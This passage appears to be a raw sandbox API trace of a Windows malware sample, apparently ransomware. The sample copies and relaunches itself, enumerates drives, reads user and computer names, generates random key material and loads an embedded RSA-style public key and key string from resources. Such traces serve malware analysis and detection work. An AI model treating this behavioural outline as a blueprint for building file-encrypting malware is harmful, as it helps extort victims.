lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fb74*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb64 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C copy /V /Y \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\"", lpProcessInformation=0x19fb64*(hProcess=0x214, hThread=0x20c, dwProcessId=0x850, dwThreadId=0x554)) returned 1 [0074.874] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0082.598] CloseHandle (hObject=0x214) returned 1 [0082.598] CloseHandle (hObject=0x20c) returned 1 [0082.598] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\nwypdmno.exe")) returned 0x20 [0082.598] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fb74*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fb64 | out: lpCommandLine="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\NWYpDmnO.exe\" -n", lpProcessInformation=0x19fb64*(hProcess=0x214, hThread=0x20c, dwProcessId=0xb68, dwThreadId=0x3ac)) returned 1 [0083.308] CloseHandle (hObject=0x214) returned 1 [0083.308] CloseHandle (hObject=0x20c) returned 1 [0083.308] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0083.308] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0083.308] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0083.308] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0083.309] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0083.309] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0083.309] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0083.309] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0083.309] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0083.313] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0083.314] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0083.314] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0083.314] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0083.314] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0083.314] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0083.315] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0083.315] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0083.315] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0083.315] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0083.315] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0083.315] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0083.316] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0083.316] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0083.316] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0083.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.316] SetErrorMode (uMode=0x1) returned 0x0 [0083.316] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x19f9c8, nVolumeNameSize=0x200, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19fbcc, lpFileSystemFlags=0x19fbc8, lpFileSystemNameBuffer=0x19f7c8, nFileSystemNameSize=0x200 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19fbcc*=0xff, lpFileSystemFlags=0x19fbc8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.317] SetErrorMode (uMode=0x0) returned 0x1 [0083.317] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LDRIVES]: C:\\", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0083.317] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LDRIVES]: C:\\", cchWideChar=14, lpMultiByteStr=0x1fb2a8c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[LDRIVES]: C:\\", lpUsedDefaultChar=0x0) returned 14 [0083.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\r\x19ﯼ\x19") returned 1 [0083.317] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0083.317] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1fba0cc, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0083.317] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\n\x19ﯼ\x19") returned 1 [0083.317] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0083.317] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1fba0cc, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0083.317] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0x10, lpOverlapped=0x0) returned 1 [0083.333] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0083.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[GENKEY]", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0083.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[GENKEY]", cchWideChar=8, lpMultiByteStr=0x1fb2a8c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[GENKEY]", lpUsedDefaultChar=0x0) returned 8 [0083.333] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0x8, lpOverlapped=0x0) returned 1 [0083.340] QueryPerformanceCounter (in: lpPerformanceCount=0x19f528 | out: lpPerformanceCount=0x19f528*=13080284143) returned 1 [0083.340] GetTickCount () returned 0x1fecd [0083.340] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x4, wSecond=0x3b, wMilliseconds=0x3cc)) [0083.340] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x4, wSecond=0x3b, wMilliseconds=0x3cc)) [0083.340] GetCurrentThreadId () returned 0x360 [0083.340] GetCurrentThread () returned 0xfffffffe [0083.340] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x19f520, lpExitTime=0x19f528, lpKernelTime=0x19f530, lpUserTime=0x19f538 | out: lpCreationTime=0x19f520, lpExitTime=0x19f528, lpKernelTime=0x19f530, lpUserTime=0x19f538) returned 1 [0083.340] GetCurrentProcessId () returned 0xbd0 [0083.340] GetCurrentProcess () returned 0xffffffff [0083.340] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x19f520, lpExitTime=0x19f528, lpKernelTime=0x19f530, lpUserTime=0x19f538 | out: lpCreationTime=0x19f520, lpExitTime=0x19f528, lpKernelTime=0x19f530, lpUserTime=0x19f538) returned 1 [0083.341] GetSystemTimes (in: lpIdleTime=0x19f520, lpKernelTime=0x19f528, lpUserTime=0x19f530 | out: lpIdleTime=0x19f520, lpKernelTime=0x19f528, lpUserTime=0x19f530) returned 1 [0083.341] QueryPerformanceFrequency (in: lpFrequency=0x19f544 | out: lpFrequency=0x19f544) returned 1 [0083.341] GetUserNameA (in: lpBuffer=0x19f444, pcbBuffer=0x19f440 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0x19f440) returned 1 [0083.345] GetComputerNameA (in: lpBuffer=0x19f444, nSize=0x19f440 | out: lpBuffer="LHNIWSJ", nSize=0x19f440) returned 1 [0083.345] QueryPerformanceCounter (in: lpPerformanceCount=0x19f528 | out: lpPerformanceCount=0x19f528*=13080722084) returned 1 [0083.345] GetTickCount () returned 0x1fecd [0083.345] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x4, wSecond=0x3b, wMilliseconds=0x3cc)) [0083.345] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x4, wSecond=0x3b, wMilliseconds=0x3cc)) [0083.345] Sleep (dwMilliseconds=0x0) [0083.439] QueryPerformanceCounter (in: lpPerformanceCount=0x19f528 | out: lpPerformanceCount=0x19f528*=13090163819) returned 1 [0083.439] GetTickCount () returned 0x1ff3b [0083.439] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x0, wMilliseconds=0x43)) [0083.439] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x0, wMilliseconds=0x43)) [0083.439] Sleep (dwMilliseconds=0x1) [0083.447] QueryPerformanceCounter (in: lpPerformanceCount=0x19f528 | out: lpPerformanceCount=0x19f528*=13091014345) returned 1 [0083.448] GetTickCount () returned 0x1ff3b [0083.448] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x0, wMilliseconds=0x51)) [0083.448] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x0, wMilliseconds=0x51)) [0083.448] GetCurrentThreadId () returned 0x360 [0083.448] GetCurrentThread () returned 0xfffffffe [0083.448] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x19f520, lpExitTime=0x19f528, lpKernelTime=0x19f530, lpUserTime=0x19f538 | out: lpCreationTime=0x19f520, lpExitTime=0x19f528, lpKernelTime=0x19f530, lpUserTime=0x19f538) returned 1 [0083.448] GetCurrentProcessId () returned 0xbd0 [0083.448] GetCurrentProcess () returned 0xffffffff [0083.448] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x19f520, lpExitTime=0x19f528, lpKernelTime=0x19f530, lpUserTime=0x19f538 | out: lpCreationTime=0x19f520, lpExitTime=0x19f528, lpKernelTime=0x19f530, lpUserTime=0x19f538) returned 1 [0083.448] GetSystemTimes (in: lpIdleTime=0x19f520, lpKernelTime=0x19f528, lpUserTime=0x19f530 | out: lpIdleTime=0x19f520, lpKernelTime=0x19f528, lpUserTime=0x19f530) returned 1 [0083.448] Sleep (dwMilliseconds=0x0) [0083.523] QueryPerformanceCounter (in: lpPerformanceCount=0x19f528 | out: lpPerformanceCount=0x19f528*=13098528926) returned 1 [0083.523] GetTickCount () returned 0x1ff79 [0083.523] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x0, wMilliseconds=0x8f)) [0083.523] GetLocalTime (in: lpSystemTime=0x19f520 | out: lpSystemTime=0x19f520*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x0, wMilliseconds=0x8f)) [0083.523] QueryPerformanceCounter (in: lpPerformanceCount=0x19f5a0 | out: lpPerformanceCount=0x19f5a0*=13098559521) returned 1 [0083.523] GetTickCount () returned 0x1ff79 [0083.523] GetLocalTime (in: lpSystemTime=0x19f598 | out: lpSystemTime=0x19f598*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x0, wMilliseconds=0x8f)) [0083.523] GetLocalTime (in: lpSystemTime=0x19f598 | out: lpSystemTime=0x19f598*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x3, wDay=0x3, wHour=0xd, wMinute=0x5, wSecond=0x0, wMilliseconds=0x8f)) [0083.523] GetCurrentThreadId () returned 0x360 [0083.523] GetCurrentThread () returned 0xfffffffe [0083.523] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x19f598, lpExitTime=0x19f5a0, lpKernelTime=0x19f5a8, lpUserTime=0x19f5b0 | out: lpCreationTime=0x19f598, lpExitTime=0x19f5a0, lpKernelTime=0x19f5a8, lpUserTime=0x19f5b0) returned 1 [0083.523] GetCurrentProcessId () returned 0xbd0 [0083.523] GetCurrentProcess () returned 0xffffffff [0083.523] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x19f598, lpExitTime=0x19f5a0, lpKernelTime=0x19f5a8, lpUserTime=0x19f5b0 | out: lpCreationTime=0x19f598, lpExitTime=0x19f5a0, lpKernelTime=0x19f5a8, lpUserTime=0x19f5b0) returned 1 [0083.524] GetSystemTimes (in: lpIdleTime=0x19f598, lpKernelTime=0x19f5a0, lpUserTime=0x19f5a8 | out: lpIdleTime=0x19f598, lpKernelTime=0x19f5a0, lpUserTime=0x19f5a8) returned 1 [0089.192] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x24c [0089.192] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0xffffffff) returned 0x0 [0089.192] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0xffffffff) returned 0x0 [0089.192] CryptAcquireContextW (in: phProv=0x19f630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19f630*=0x2b03d8) returned 1 [0090.510] CryptGenRandom (in: hProv=0x2b03d8, dwLen=0x28, pbBuffer=0x19f644 | out: pbBuffer=0x19f644) returned 1 [0090.510] CryptReleaseContext (hProv=0x2b03d8, dwFlags=0x0) returned 1 [0090.510] ReleaseMutex (hMutex=0x24c) returned 1 [0090.510] ReleaseMutex (hMutex=0x24c) returned 1 [0090.510] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0xffffffff) returned 0x0 [0090.510] ReleaseMutex (hMutex=0x24c) returned 1 [0090.510] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f3afac, cbMultiByte=256, lpWideCharStr=0x19e658, cchWideChar=2047 | out: lpWideCharStr="460F9943EA70F10389BA83827D38761C44D11556600CAE47FCE041FA7B932D63456C63CAC311F175B384AE9D742C1919243EC577E8E195AF9A6777067A97B1557C62EC71693686B198A63D84C57647176C70FCD8E65EE168A95AEB69EDD8B7D31F0259574BB35C7D1312CAB0642968D6D26247780CD229D25FF9D4575E569A5B\x03") returned 256 [0090.510] FindResourceW (hModule=0x400000, lpName="MPUB", lpType=0xa) returned 0x4f5470 [0090.510] LoadResource (hModule=0x400000, hResInfo=0x4f5470) returned 0x525f1c [0090.510] SizeofResource (hModule=0x400000, hResInfo=0x4f5470) returned 0x192 [0090.511] LockResource (hResData=0x525f1c) returned 0x525f1c [0090.511] FreeResource (hResData=0x525f1c) returned 0 [0090.511] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0090.511] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x525e94 [0090.511] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0090.511] LockResource (hResData=0x525e94) returned 0x525e94 [0090.511] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0090.511] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe5008, cbMultiByte=38, lpWideCharStr=0x1fde2cc, cchWideChar=38 | out: lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N\r\n42\r\n") returned 38 [0090.511] FreeResource (hResData=0x525e94) returned 0 [0090.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0090.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", cchWideChar=32, lpMultiByteStr=0x1fe500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lt45h26X9vK8iPUNCOf6bHlJeJj9oT4N", lpUsedDefaultChar=0x0) returned 32 [0090.511] GetCurrentThreadId () returned 0x360 [0090.511] GetCurrentThreadId () returned 0x360 [0090.511] GetCurrentThreadId () returned 0x360 [0090.511] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f41108, cbMultiByte=402, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 402 [0090.511] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f41108, cbMultiByte=402, lpWideCharStr=0x1f3afac, cchWideChar=402 | out: lpWideCharStr="1536\r\n5DC40BF53542182C8C684E51232980C956A22CE7A79CADC89E3628BC2B444AA832CEFF2E54A970BABDF5259265FBC2979FDDD5DAD82D4D783D7CD0B3BBC709325BEDA0D98D40A251DAE49C42B8EC22B1934A5F3B76EEDBF42433030AB262B4812FBD8563DE5AEA73B4F4D3D53BE022F00FE2B577F358CCF87346C6F430B32B13A0AE8E87ECA3DC662F45ECA37BEC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\r\n00010001\r\n") returned 402 [0090.511] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5DC40BF53542182C8C684E51232980C956A22CE7A79CADC89E3628BC2B444AA832CEFF2E54A970BABDF5259265FBC2979FDDD5DAD82D4D783D7CD0B3BBC709325BEDA0D98D40A251DAE49C42B8EC22B1934A5F3B76EEDBF42433030AB262B4812FBD8563DE5AEA73B4F4D3D53BE022F00FE2B577F358CCF87346C6F430B32B13A0AE8E87ECA3DC662F45ECA37BEC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5", cchWideChar=384, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 384 [0090.511] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5DC40BF53542182C8C684E51232980C956A22CE7A79CADC89E3628BC2B444AA832CEFF2E54A970BABDF5259265FBC2979FDDD5DAD82D4D783D7CD0B3BBC709325BEDA0D98D40A251DAE49C42B8EC22B1934A5F3B76EEDBF42433030AB262B4812FBD8563DE5AEA73B4F4D3D53BE022F00FE2B577F358CCF87346C6F430B32B13A0AE8E87ECA3DC662F45ECA37BEC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5", cchWideChar=384, lpMultiByteStr=0x1f3afac, cbMultiByte=384, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5DC40BF53542182C8C684E51232980C956A22CE7A79CADC89E3628BC2B444AA832CEFF2E54A970BABDF5259265FBC2979FDDD5DAD82D4D783D7CD0B3BBC709325BEDA0D98D40A251DAE49C42B8EC22B1934A5F3B76EEDBF42433030AB262B4812FBD8563DE5AEA73B4F4D3D53BE022F00FE2B577F358CCF87346C6F430B32B13A0AE8E87ECA3DC662F45ECA37BEC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5", lpUsedDefaultChar=0x0) returned 384 [0090.511] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="00010001", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0090.511] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="00010001", cchWideChar=8, lpMultiByteStr=0x1fb2ccc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="00010001", lpUsedDefaultChar=0x0) returned 8 [0090.512] GetCurrentThreadId () returned 0x360 [0090.512] GetCurrentThreadId () returned 0x360 [0090.512] GetCurrentThreadId () returned 0x360 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=384, lpWideCharStr=0x19e658, cchWideChar=2047 | out: lpWideCharStr="5DC40BF53542182C8C684E51232980C956A22CE7A79CADC89E3628BC2B444AA832CEFF2E54A970BABDF5259265FBC2979FDDD5DAD82D4D783D7CD0B3BBC709325BEDA0D98D40A251DAE49C42B8EC22B1934A5F3B76EEDBF42433030AB262B4812FBD8563DE5AEA73B4F4D3D53BE022F00FE2B577F358CCF87346C6F430B32B13A0AE8E87ECA3DC662F45ECA37BEC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x10Ȉ\x19") returned 384 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=256, lpWideCharStr=0x19e2f8, cchWideChar=2047 | out: lpWideCharStr="460F9943EA70F10389BA83827D38761C44D11556600CAE47FCE041FA7B932D63456C63CAC311F175B384AE9D742C1919243EC577E8E195AF9A6777067A97B1557C62EC71693686B198A63D84C57647176C70FCD8E65EE168A95AEB69EDD8B7D31F0259574BB35C7D1312CAB0642968D6D26247780CD229D25FF9D4575E569A5B\x01\x1a钴낛\x19鵌瞜\x19ƀ") returned 256 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=384, lpWideCharStr=0x19e2f8, cchWideChar=2047 | out: lpWideCharStr="5DC40BF53542182C8C684E51232980C956A22CE7A79CADC89E3628BC2B444AA832CEFF2E54A970BABDF5259265FBC2979FDDD5DAD82D4D783D7CD0B3BBC709325BEDA0D98D40A251DAE49C42B8EC22B1934A5F3B76EEDBF42433030AB262B4812FBD8563DE5AEA73B4F4D3D53BE022F00FE2B577F358CCF87346C6F430B32B13A0AE8E87ECA3DC662F45ECA37BEC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 384 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=256, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: lpWideCharStr="460F9943EA70F10389BA83827D38761C44D11556600CAE47FCE041FA7B932D63456C63CAC311F175B384AE9D742C1919243EC577E8E195AF9A6777067A97B1557C62EC71693686B198A63D84C57647176C70FCD8E65EE168A95AEB69EDD8B7D31F0259574BB35C7D1312CAB0642968D6D26247780CD229D25FF9D4575E569A5BEC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 256 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=256, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: lpWideCharStr="007A0EB2F59F7B24690589EB936A94F3304CB3F67884DD92C3D7CADB278822E0F01202C3D87C00C6AA4816E01F7045637469B0F255F5630D64E19B5FC1E9D25D1E5EC701FC163036BDC2A5243EA6EC63DAFE4D01DFA8036420682064167677234F99F8420EEE6D6741A858A537B2CE33BCEC4DA21C4CAF1525C6AF02097478E1EC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 256 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2cec, cbMultiByte=8, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: lpWideCharStr="00010001F59F7B24690589EB936A94F3304CB3F67884DD92C3D7CADB278822E0F01202C3D87C00C6AA4816E01F7045637469B0F255F5630D64E19B5FC1E9D25D1E5EC701FC163036BDC2A5243EA6EC63DAFE4D01DFA8036420682064167677234F99F8420EEE6D6741A858A537B2CE33BCEC4DA21C4CAF1525C6AF02097478E1EC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 8 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=128, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: lpWideCharStr="FBD308E63FADDE80BD175AAECE02FF2B34CF68A71BA2896859BFFB315164FDB1EF47F50F2D6F959A279D11F5FB3F77375E913919A8583573B9EBADA79170C8031E5EC701FC163036BDC2A5243EA6EC63DAFE4D01DFA8036420682064167677234F99F8420EEE6D6741A858A537B2CE33BCEC4DA21C4CAF1525C6AF02097478E1EC7AC69A2C82589671A2746640657FC2C829579669848DEBF652FE840392A27BA477C3546FDB0CB6F8683AAAAEA7228B27C2B5\x19懊蒼\x19쐈@Ӥ") returned 128 [0090.512] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1f54b6c, cbMultiByte=128, lpWideCharStr=0x19e32c, cchWideChar=2047 | out: 